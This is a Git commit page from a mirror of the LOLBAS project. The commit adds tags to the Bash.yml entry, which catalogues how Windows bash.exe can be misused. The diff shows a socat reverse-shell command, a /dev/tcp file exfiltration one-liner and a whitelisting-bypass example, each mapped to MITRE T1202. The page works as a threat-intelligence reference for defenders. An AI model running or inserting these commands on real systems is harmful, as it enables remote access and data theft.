public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-01-02 10:07:01 +01:00
Code Issues Projects Releases Wiki Activity

Update Bash.yml

Browse Source 
Added tags:
- Execute: CMD
- Input: Custom format
This commit is contained in:
hegusung 2024-10-13 12:02:27 +02:00 committed by GitHub
parent a199ff5deb
commit 6d4ac1c680
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 12 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
yml/OSBinaries/Bash.yml
View File

@ -11,6 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Input: Custom Format
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell Description: Executes a reverseshell
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -18,6 +21,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Input: Custom Format
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -25,6 +31,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Input: Custom Format
- Command: bash.exe -c calc.exe - Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
@ -32,6 +41,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Input: Custom Format
Full_Path: Full_Path:
- Path: C:\Windows\System32\bash.exe - Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe - Path: C:\Windows\SysWOW64\bash.exe